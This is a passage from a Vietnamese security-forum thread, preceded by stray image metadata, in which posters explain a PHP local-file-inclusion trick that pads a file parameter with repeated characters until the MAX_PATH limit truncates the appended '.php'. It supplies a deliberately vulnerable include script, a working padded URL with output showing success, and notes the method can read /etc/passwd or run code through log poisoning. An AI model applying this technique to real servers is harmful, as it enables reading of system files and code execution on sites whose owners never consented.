- Encoding Process : Baseline DCT, Huffman coding
- Bits Per Sample : 8
- Color Components : 3
- Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
- Image Size : 1920x1080
- Thumbnail Image : (Binary data 2997 bytes, use -b option to extract)


file php.ini của lão
Code:
error_reporting = E_ALL & ~E_NOTICE & ~E_DEPRECATED


Lão thử xoá cái E_NOTICE đi, nó là cái thằng sẽ thông báo cho lão là path có truncate hay không

Một cách để tìm đúng cái số byte, là lão cho một đường link đúng vào rồi tăng cái "a" lên từ từ đến khi nào vừa đến cái ngưỡng mà nó thông báo lỗi.

Như trong ví dụ của tôi thì đầu tiên lão tạo 1 file index vớ vẩn gì đấy, rồi test :
Code:
.../test.php?file=index

==> hiển nhiên nó sẽ include thành công file "index.php" trong cùng thư mục

sau đó thêm "a" vào:
Code:
../test.php?file=aaaa...aaa/../index

Tăng nhiều nhiều đến 1 lúc nào đó, error sẽ hiện ra, vì đoạn .php phía sau hoặc cả cái đoạn index sẽ bị truncate. Lúc đó lão giảm 'a' đi từ từ (như kiểu nhị phân) đến khi nào vừa đủ <=> thêm một 'a' vào nữa thôi là sẽ bị error. Việc còn lại chỉ là thêm 4 cái 'a' vào để truncate cái ".php" rồi xxx nó etc...

smilie) Hình như google sẽ có cái tool = python làm dùm việc này, lão thử search xem


Về cái MAX_PATH hay PATH_MAX, nó là giá trị của OS ở trong một vài file header khi compile chương trình, bởi vậy muốn chỉnh chắc phải recompile php

Edit... mình vừa test thử trên version PHP 5.3.2 trên máy ubuntu 10 của mình thì không thành công
Mình sử dụng php ver 5.2.1 thì vẫn làm được ở trên local, máy window 7, tuy nhiên length không phải là 4096 smilie mà là 260, có lẽ giá trị khác nhau trên các OS khác nhau

Tạo 2 file như thế này để test:

test.php
Code:
<?php
$file = $_GET['file'];
include($file.".php");
?>


as.txt
Code:
<?php
echo "success";
?>


File php.ini
Code:
error_reporting = E_ALL
magic_quotes_gpc = on


Code:
http://localhost:8080/test.php?file=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/../as.txt


Kết quả
Code:
Notice: include() [function.include]: X:\XXX\www/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/../as.txt.php path was truncated to 260 in X:\XXX\www\test.php on line 3
success


Có chữ success smilie
Thanks xnohat đã share một hướng rất thú vị, giờ mới biết php có cái filter như thế

Có một cách để include mà windak biết được (không nhớ rõ là đọc ở đâu) sử dụng việc đường dẫn tới file bị giới hạn bởi giá trị MAX_PATH (thường là 4096)

Nghĩa là bất cứ Path nào có độ dài hơn 4096 thì sẽ bị truncate

$file = [aa...aaa../../../../../../etc/passwd]
[ 4096 bytes ]

thì include( $file.".php" )

đoạn .php sẽ bị truncate, và ta có thể đọc được /etc/passwd (hoặc execute code bằng kĩ thuật cũ viết vào file log)



ý tôi là "tháo gỡ vấn đề", hỏi vấn đề cần cái gì thì tháo gỡ cái đó...
 
Go to Page:  First Page Page 2 4 5 6 Page 7 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|